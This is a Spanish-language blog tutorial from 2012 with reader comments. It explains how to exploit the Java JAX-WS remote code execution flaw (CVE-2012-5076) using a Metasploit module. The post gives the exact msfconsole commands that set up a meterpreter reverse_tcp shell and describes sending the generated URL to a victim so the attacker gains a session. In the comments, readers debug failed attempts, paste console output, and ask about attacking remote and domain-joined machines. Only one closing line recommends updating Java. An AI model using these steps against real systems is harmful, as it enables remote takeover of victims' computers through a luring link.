martes, 13 de noviembre de 2012

[CVE-2012-5076] Explotando Java Applet JAX-WS Remote Code Execution



Recientemente se ha publicado una nueva vulnerabilidad en Java, denominada Java Applet JAX-WS Remote Code Execution descubierta por @_juan_vazquez_ la cual afecta a la versión 1.7.0_07-b10 y anteriores.

El exploit respectivo para aprovecharse de esta vulnerabilidad se encuentra respectivamente en los modulos de Metasploit y se puede utilizar con tal solo realizar un msfupdate.

El modulo disponible en Metasploit para esta vulnerabilidad se aprovecha de los JAX-WS classes desde un Java Applet para ejecutar código arbitrario Java.

Los procedimientos y requerimientos para explotar esta vulnerabilidad son muy simples, solo basta con tener BackTrack y un Sistema Virtual para realizar las pruebas.


REQUERIMIENTOS:

Backtrack 5 R1 - R2 o R3 (Atacante)
Metasploit Framework (Atacante)
Windows XP - 7 (Victima)
Google Chorme, Firefox o IE (Victima)


PROCEDIMIENTO DEL ATAQUE:

Abrimos Metasploit (msfconsole) y ejecutamos los siguientes comandos:
------------------------------------------------------------------------------------------------------------------
use exploit/multi/browser/java_jre17_jaxws
set PAYLOAD windows/meterpreter/reverse_tcp
set SRVHOST 192.168.1.19
set TARGET 1
set LHOST 192.168.1.19
exploit
------------------------------------------------------------------------------------------------------------------



Como ya es de conocimiento y costumbre, estos comandos creara una URL que sera enviada a al usuario para que lo ejecute desde cualquier navegador web, ya sea Google Chorme, Firefox, Internet Explorer u Opera que contenga la version del Java vulnerable 1.7.0_07-b10 y anteriores.



Seguidamente si el usuario logra ejecutar la URL generada en cualquier Sistema Operativo o Navegador, lograremos obtener una session metepreter como se aprecia en la siguiente imagen:



Por lo tanto, solo quedaría ejecutar los respectivos comandos de Explotación y Post-Explotacion para aprovecharnos del sistema que hemos vulnerable con una simple URL gracias a este nuevo exploit recién salida del horno.



VIDEO-TUTORIAL:



Para no ser victima de este Ataque, se recomienda actualizar el Java a la ultima versión disponible, que se puede descargar haciendo clic Aqui.

Un saludo.

17 comentarios:

  1. Lo e echo con un PC con el S.O. Windows 7 y me da este error:

    java_JAX-WS - Exception handling request: No such file or directory - C:/metasploit/msf3/data/exploits/cve-2012-5076/Exploit.class


    Por que me sale esto ¿?

    ResponderEliminar
    Respuestas
    1. Hola,

      Al parecer estas ejecutando el MSF desde un Windows y no lo tenes actualizado.

      Ese error indica que no encuentra el cve-2012-5076/Exploit.class, ejecuta el comando msfupdate.

      Saludos.

      Eliminar
    2. Gracias por contestarme :)

      Lo que e echo ahora a sido ejecutar Msf update y me sale otro error jeje me sale esto:

      https://picasaweb.google.com/113556193702083725238/15DeNoviembreDe2012#5810873011160327394

      Eliminar
    3. Te aconsejo que utilices backtrack o cualquier otra distribución de linux, tendras menos errores que con windows ;)

      Eliminar
  2. Existe alguna manera de correr el exploit remotamente, es decir no localmente sino mediante internet sin tener que montar un host ja ja ?

    ResponderEliminar
    Respuestas
    1. Hola,

      Si de hecho, podes usar el comando RHOST e indicar la IP de la victima.

      Saludos.

      Eliminar
    2. les hace falta mucho por aprender , Caleb bonito tu blog informacion buena y muy bien explicada , que sigas escribiendo mas post .

      Eliminar
  3. ya no funciona amigos , fue corregida un saludo :)

    ResponderEliminar
  4. Hola, ¿como se puede saber a que version de java corresponde ese fallo?
    Gracias

    ResponderEliminar
    Respuestas
    1. Hola, las versiones vulnerables son el 1.7.0_07-b10 y anteriores.

      Resaltar que las versiones vulnerables son las versiones de los updates que se realizo cuando se encontró el ultimo 0-day en octubre.

      Un saludo.

      Eliminar
    2. yo me refiero a la version de java, yo por ejemplo en mi pc tengo la version 6, y no se si el 1.7.0_07-b10 corresponde a esta versión o no.
      Un Saludo

      Eliminar
  5. Buenas, lo he probado pero me sale esto:
    msf > use exploit/multi/browser/java_jre17_jaxws
    msf exploit(java_jre17_jaxws) > set PAYLOAD windows/meterpreter/reverse_tcp
    PAYLOAD => windows/meterpreter/reverse_tcp
    msf exploit(java_jre17_jaxws) > set SRVHOST 192.168.1.33
    SRVHOST => 192.168.1.33
    msf exploit(java_jre17_jaxws) > set TARGET 1
    TARGET => 1
    msf exploit(java_jre17_jaxws) > set LHOST 192.168.1.33
    LHOST => 192.168.1.33
    msf exploit(java_jre17_jaxws) > exploit
    [*] Exploit running as background job.

    [*] Started reverse handler on 192.168.1.33:4444
    msf exploit(java_jre17_jaxws) > [*] Using URL: http://192.168.1.33:8080/Oh62SObwNC
    [*] Server started.
    [*] 192.168.1.34 java_jre17_jaxws - Java Applet JAX-WS Remote Code Execution handling request
    [*] 192.168.1.34 java_jre17_jaxws - Sending Applet.jar
    [*] 192.168.1.34 java_jre17_jaxws - Sending Applet.jar
    [*] 192.168.1.34 java_jre17_jaxws - Java Applet JAX-WS Remote Code Execution handling request

    y no pasa de aqui. Lo he probado en un pc vulnerable.
    Gracias

    ResponderEliminar
    Respuestas
    1. Hola,

      Los comandos que estas ejecutando están perfectamente, al parecer la versión del Java que tiene la PC vulnerable no es la que he mencionado en esta entrada.

      Podes fijarte la versión desde el CMD ejecutando java --version

      Saludos.

      Eliminar
    2. Gracias por responder Caleb Bucker, el comando que pones desde el CMD no me funciona.He mirado en Agregar y Quitar programas y me pone la versión Java 6 update 26. He buscado por internet y creo que esa versión si es vulnerable (1.6.0_35-b10). Seguiré probando.
      Un Saludo

      Eliminar
  6. java version "1.7.0_09"
    Java(TM) SE Runtime Environment (build 1.7.0_09-b05)
    Java HotSpot(TM) 64-Bit Server VM (build 23.5-b02, mixed mode)

    corregido

    ResponderEliminar
    Respuestas
    1. yo no lo he actualizado, sigo con la versión 1.6.0_35-b10, que teoricamente es vulnerable.
      Un Saludo

      Eliminar
  7. Hi Amigos

    I noticed that i am able to take control of the victim ( XP or Win7) if it is in work group , but if victim is in a domain exploit always fails.
    Any additional step needed in case the victim is in a domain ?

    ResponderEliminar